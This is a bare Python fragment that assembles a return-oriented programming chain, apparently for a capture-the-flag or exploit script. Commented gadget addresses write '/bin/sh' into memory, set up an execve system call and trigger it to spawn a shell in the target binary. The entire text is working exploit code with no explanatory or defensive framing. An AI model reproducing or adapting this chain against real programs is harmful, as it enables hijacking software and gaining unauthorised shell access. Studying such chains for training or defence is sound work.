payload = p64(0x4151ac)
#0x00000000004151ac: pop rsi; ret; 
payload += p64(0x4d8010)+p64(0x48bde6)
# 0x000000000048bde6: pop rax; ret 2; 
payload += p64(0x68662f6e69622f)+p64(0x47878b)+"\x00"*2
# 0x000000000047878b: or qword ptr [rsi + 0x60], rax; add rsp, 8; ret; 
payload += p64(0x0)+p64(0x48bde6)
# 0x000000000048bde6: pop rax; ret 2; 
payload += p64(0x4d8200)+p64(0x47dc73)+"\x00"*2
# 0x000000000047dc73: add al, byte ptr [rax]; mov edx, 0; cmovne rax, rdx; ret; 
payload += p64(0x4151ac)
# 0x00000000004151ac: pop rsi; ret; 
payload += p64(0x0)+p64(0x48bde6)
# 0x000000000048bde6: pop rax; ret 2; 
payload += p64(0x3b)+p64(0x4131ee)+"\x00"*2
# 0x00000000004131ee: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x157d78c3802c3a96)+p64(0x44c9e2)
# 0x000000000044c9e2: pop rcx; pop rbx; ret; 
payload += p64(0x3aa0a1cf200851d1)+p64(0x0)+p64(0x439a5c)
# 0x0000000000439a5c: add byte ptr [rbp + rcx*4 + 5], cl; pop rdi; ret; 
payload += p64(0x4d8070)+p64(0x41c0ae)
# 0x000000000041c0ae: syscall; 
payload += b''
